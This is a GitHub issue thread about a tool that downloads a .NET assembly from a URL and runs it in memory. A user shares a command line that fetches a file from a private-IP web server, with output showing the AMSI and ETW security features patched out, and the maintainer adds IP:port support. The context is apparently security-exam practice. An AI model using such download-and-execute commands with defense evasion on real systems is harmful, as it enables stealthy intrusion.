### ISSUE TITLE
Error while connecting to URL

### ISSUE THREAD

**Issue by init5-SF** [D1rkMtr/ExecRemoteAssembly#2]
hi, I switched the solution to Debug instead of release and now it compiled correctly, but it wont establish an http connection to the file

```
C:\tools\ExecRemoteAssembly\ExecRemoteNET\x64\Debug>ExecRemoteNET.exe "http://192.168.194.128/calc.exe" ""
[-] Failed to load amsi.dll
[+] Patched etw!
[+] Patched amsi!
[+] Patched amsi open session!
 ~ Execute Remote .NET Assembly ~
[!] WinHttpConnect: 12005
```

192.168.194.128 is a web server and its up and running, I verified the connection using PowerShell and it was successful.
Any suggestions?

Thanks in advance.

**Comment by D1rkMtr** [comment]
Hi :
1 - the ExecRemoteAssembly is created only to run .NET assemblies , that are based on C# , to run binaries that are based on C/C++/ASM u can use the other project https://github.com/D1rkMtr/FilelessRemotePE
2 - the ExecRemoteAssembly accept only URI of type https://domain.name/PathToUri

**Comment by D1rkMtr** [comment]
But i could work on the 2nd point if you want , i don't mind

**Comment by init5-SF** [comment]
> But i could work on the 2nd point if you want , i don't mind

Actually that would be super helpful, if it can take a URL with IP instead of domain name.
I was hoping I could use this tool in my next exam ^^

Thanks in advance!

**Comment by D1rkMtr** [comment]
ok i will work on it , and ping you here

**Comment by init5-SF** [comment]
Thanks, you're the best!

**Comment by init5-SF** [comment]
> But i could work on the 2nd point if you want , i don't mind

Hey there, any luck with http://IP:PORT support?

**Comment by D1rkMtr** [comment]
ok i'll try today , i was very busy those past days , i will ping u here when i ll finish it

**Comment by D1rkMtr** [comment]
done 
![ipPort](https://user-images.githubusercontent.com/110354855/198319234-132c214a-2863-4a7e-9906-a7409d11b3d9.png)

**Comment by init5-SF** [comment]
Perfect, thanks!
I'll give it a spin.
